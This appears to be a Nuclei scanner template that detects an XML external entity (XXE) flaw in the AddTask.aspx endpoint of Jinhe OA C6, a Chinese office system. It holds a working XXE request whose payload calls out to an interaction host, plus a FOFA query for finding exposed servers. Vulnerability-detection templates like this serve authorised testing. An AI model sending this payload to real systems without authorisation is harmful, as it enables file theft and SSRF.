http:
    - matchers:
        - dsl:
            - status_code==200 && contains(interactsh_protocol, "dns")
          name: XML注入
          type: dsl
      raw:
        - |
          POST /c6/Jhsoft.Web.dailytaskmanage/AddTask.aspx/ HTTP/1.1
          Host: {{Hostname}}
          Content-Type: application/xml

          <?xml version="1.0" encoding="UTF-8"?>
          <!DOCTYPE root [
          <!ENTITY % remote SYSTEM "http://{{interactsh-url}}">
          %remote;]>
          <root/>
id: JinHe-OA-C6-AddTask-XXE
info:
    author: HuanXiong
    description: |-
        fofa: app="金和网络-金和OA"
        金和OA AddTask.aspx 接口处存在XML实体注入漏洞，攻击者可利用xxe漏洞获取服务器敏感数据，可读取任意文件以及ssrf攻击，存在一定的安全隐患。
    name: 金和OA C6 AddTask.aspx XXE漏洞
    reference:
        - null
    severity: medium
    tags:
        - XXE
        - 金和oa
        - 金和网络-金和OA
